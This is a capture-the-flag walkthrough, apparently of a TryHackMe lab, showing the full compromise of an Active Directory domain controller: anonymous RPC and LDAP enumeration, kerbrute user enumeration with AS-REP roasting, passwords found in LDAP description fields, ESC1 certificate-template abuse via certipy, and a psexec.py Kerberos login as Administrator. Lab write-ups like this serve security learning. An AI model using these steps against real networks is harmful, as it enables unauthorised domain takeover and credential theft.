Difficulty: Hard
Type: Active Directory
Port Scan #
Cleaned port scan
Nmap scan report for 10.66.151.236
Host is up, received syn-ack ttl 126 (0.060s latency).
# Authentication & Directory Services
88/tcp kerberos-sec Microsoft Windows Kerberos
389/tcp ldap Microsoft Windows Active Directory
464/tcp kpasswd5? Kerberos password change?
636/tcp ssl/ldap Secure LDAP
3268/tcp ldap Global Catalog LDAP
3269/tcp ssl/ldap Global Catalog LDAP over SSL
# Web Services
80/tcp http Microsoft IIS httpd 10.0
443/tcp ssl/https? Possibly HTTPS
47001/tcp http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# Remote Access
3389/tcp ms-wbt-server Microsoft Terminal Services (RDP)
# Microsoft RPC / DCOM
135/tcp msrpc Microsoft Windows RPC
593/tcp ncacn_http Microsoft Windows RPC over HTTP
9389/tcp mc-nmf .NET Message Framing
49664/tcp msrpc Microsoft Windows RPC
49665/tcp msrpc Microsoft Windows RPC
49666/tcp msrpc Microsoft Windows RPC
49668/tcp msrpc Microsoft Windows RPC
49669/tcp ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp msrpc Microsoft Windows RPC
49671/tcp msrpc Microsoft Windows RPC
49675/tcp msrpc Microsoft Windows RPC
49676/tcp msrpc Microsoft Windows RPC
49681/tcp msrpc Microsoft Windows RPC
49702/tcp msrpc Microsoft Windows RPC
49712/tcp msrpc Microsoft Windows RPC
49718/tcp msrpc Microsoft Windows RPC
49722/tcp msrpc Microsoft Windows RPC
# File Sharing / Network Services
139/tcp netbios-ssn Microsoft Windows NetBIOS
445/tcp microsoft-ds? SMB over TCP
# DNS Services
53/tcp domain Simple DNS PlusAdd to our /etc/hosts
10.66.151.236 thm.local labyrinth.thm.localJumping right in #
From our port scan the first thing that jumps out to me is that we have a web server on port 80,443, as well as 47001.
a quick google search shows port 47001 is commonly associated with winrm. odd we have a webserver there
We cant access it over http, at least from our browser.
we see a default iis web server on port 80.
ran a dir brute force and found nothing notable here which was expected. Also tested against https.
┌──(parallels㉿Kali)-[~/targets/ledger]
└─$ gobuster dir -u http://10.66.151.236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,json,xml -b 404 -k -o dirs.txt -t 50
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.66.151.236/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: xml,php,html,json
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ (Status: 400) [Size: 3490]
*checkout* (Status: 400) [Size: 3490]
*docroot* (Status: 400) [Size: 3490]
* (Status: 400) [Size: 3490]
devinmoore* (Status: 400) [Size: 3490]
200109* (Status: 400) [Size: 3490]
*sa_ (Status: 400) [Size: 3490]
*dc_ (Status: 400) [Size: 3490]
Progress: 1102790 / 1102790 (100.00%)
===============================================================
Finished
===============================================================Enumeration #
we run enum4linux for unauthenticated/anonymous enumeration
enum4linux-ng -A labyrinth.thm.local -oA results.txt the main thing we look for here running an unauthenticated scan is any sort of anonymous access. which we find we can authenticate anonymously to rpc.
================================================
| RPC Session Check on labyrinth.thm.local |
================================================
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''with this information i decided to try to connect to smb first.
SMB #
I could list shares, access the NETLOGON and SYSVOL shares but had no list permissions so moved on for now.
RPC #
next, I tried connecting to rpc anonymously which worked but i couldn’t run any useful commands except for querying the domain sid.
even though it appears we cant run any useful commands manually, we will continue to enumerate with Impackets rpcdump.py tool.
running rpcdump.py as anonymous was successful, we successfully listed 420 endpoints.
With RPC access available, we can enumerate domain users by brute-forcing SIDs using lookupsid.py, which resolves valid accounts by incrementing RIDs against the domain SID.
now we clean our user list and check our options for as-rep roasting, password spraying, etc.
Using the user list, we validate active accounts via Kerberos enumeration with kerbrute, which identifies valid users and detects accounts with pre-auth disabled, enabling AS-REP hash extraction for offline cracking.
kerbrute_linux_arm64 userenum users.txt -d thm.local --dc 10.66.151.236 > valid-users.txt
.......
2026/01/20 13:52:48 > Done! Tested 493 usernames (490 valid) in 7.040 secondsfrom running kerbrute we also see that we have various users accounts that have no pre auth required, so their hash gets dumped for us. now we can save these hashes and crack them using hashcat.
cracking these hashes with rockyou.txt didnt work
since rockyou.txt didnt work, I thought the goal could be to get the domains password policy so we can create our own targeted wordlist with some hashcat rules for a better hit rate. but decided to stop here for now.
LDAP #
Took a break, vm ip is now 10.64.146.175
leaving as-rep roasting as a dead end i checked to see what we could dump from ldap as anonymous.
we dump 17 thousand lines worth of ldap data… unauthenticated…
after manual review we see the description field consistently set regarding the users level of access “tier 1 user” so we grep for description to check any differences
cat ldap.txt | grep descriptionto my surprise, it looks like an admin left default creds in the description fields of a couple users.
lets see who they belong to
Initial Access #
now we have 1 possible password for 2 different users, Susanna_mcknight and ivy_willis
unfortunately my tryhackme machine lost connection dropped, new ip 10.65.176.175
confirmed successful smb authentication for susanna, and ivy accounts. the password is not expired.
since we have rdp open, we try with ivy, which fails, then we try with susanna, it succeeds. we now have user.txt and a foothold.
Privilege escalation #
Bloodhound
didn’t find much, good to have for later. never ended up using.
enumerating installed programs → nothing really interesting other than certificate services
PS C:\Users\SUSANNA_MCKNIGHT\Downloads> Get-Service | Where-Object {$_.StartType -eq "Auto" -and $_.Status -eq "Running"}
>>
Status Name DisplayName
------ ---- -----------
Running ADWS Active Directory Web Services
Running AmazonSSMAgent Amazon SSM Agent
Running AppHostSvc Application Host Helper Service
Running BFE Base Filtering Engine
Running BrokerInfrastru... Background Tasks Infrastructure Ser...
Running CDPSvc Connected Devices Platform Service
Running CDPUserSvc_152ed2 Connected Devices Platform User Ser...
Running CertSvc Active Directory Certificate Services
Running CoreMessagingRe... CoreMessaging
Running CryptSvc Cryptographic Services
Running DcomLaunch DCOM Server Process Launcher
Running Dfs DFS Namespace
Running DFSR DFS Replication
Running Dhcp DHCP Client
Running DNS DNS Server
Running Dnscache DNS Client
Running DPS Diagnostic Policy Service
Running EventLog Windows Event Log
Running EventSystem COM+ Event System
Running FontCache Windows Font Cache Service
Running gpsvc Group Policy Client
Running IKEEXT IKE and AuthIP IPsec Keying Modules
Running iphlpsvc IP Helper
Running IsmServ Intersite Messaging
Running Kdc Kerberos Key Distribution Center
Running LanmanServer Server
Running LanmanWorkstation Workstation
Running LSM Local Session Manager
Running mpssvc Windows Defender Firewall
Running MSDTC Distributed Transaction Coordinator
Running Netlogon Netlogon
Running NlaSvc Network Location Awareness
Running nsi Network Store Interface Service
Running Power Power
Running ProfSvc User Profile Service
Running RpcEptMapper RPC Endpoint Mapper
Running RpcSs Remote Procedure Call (RPC)
Running SamSs Security Accounts Manager
Running Schedule Task Scheduler
Running SENS System Event Notification Service
Running ShellHWDetection Shell Hardware Detection
Running Spooler Print Spooler
Running SysMain SysMain
Running SystemEventsBroker System Events Broker
Running Themes Themes
Running UALSVC User Access Logging Service
Running UserManager User Manager
Running UsoSvc Update Orchestrator Service
Running W32Time Windows Time
Running W3SVC World Wide Web Publishing Service
Running Wcmsvc Windows Connection Manager
Running WinDefend Windows Defender Antivirus Service
Running Winmgmt Windows Management Instrumentation
Running WinRM Windows Remote Management (WS-Manag...
Running WpnService Windows Push Notifications System S...
Running WpnUserService_... Windows Push Notifications User Ser...
PS C:\Users\SUSANNA_MCKNIGHT\Downloads>whoami / all enumeration
PS C:\Users\SUSANNA_MCKNIGHT\Downloads> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
thm\susanna_mcknight S-1-5-21-1966530601-3185510712-10604624-1475
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\Users\SUSANNA_MCKNIGHT\Downloads>we see the group Certificate Service DCOM Access, lets try to grab certificate templates as this user.
after dumping the templates we see template #34 is named vuln and allows any authenticated user to enroll in the certificate. were definitely on the right path here.
after doing a bit of research on ad cs vulnerabilities. i came across the tool certipy-ad which we can use to scan all of our found templates for vulnerabilities.
now we can sift through the output
we find that the template ServerAuth is vulnerable to a ESC1 misconfiguration!
ESC1 can be described as follows
“ESC1 is the stereotypical AD CS misconfiguration that can lead directly to privilege escalation. The vulnerability arises when a certificate template is inadequately secured, permitting a low-privileged user to request a certificate and, importantly, specify an arbitrary identity within the certificate’s SAN. This allows the attacker to impersonate any user, including administrators.”
https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation
knowing this, lets impersonate the administrator user.
first lets request a certificate as the administrator
now lets use that certificate to request a tgt so we can login.
we run this export command so psexec knows where to find our .ccache file.
export KRBSCCNAME=~/targets/ledger/administrator.ccachewe then used psexec to authenticate over SMB and create a temporary service on the target system, resulting in an interactive shell running as the Administrator user.
psexec.py -dc-ip 10.65.176.175 -target-ip 10.65.176.175 -no-pass -k thm.local/administrator@LABYRINTH.thm.local
now we can get our root flag.
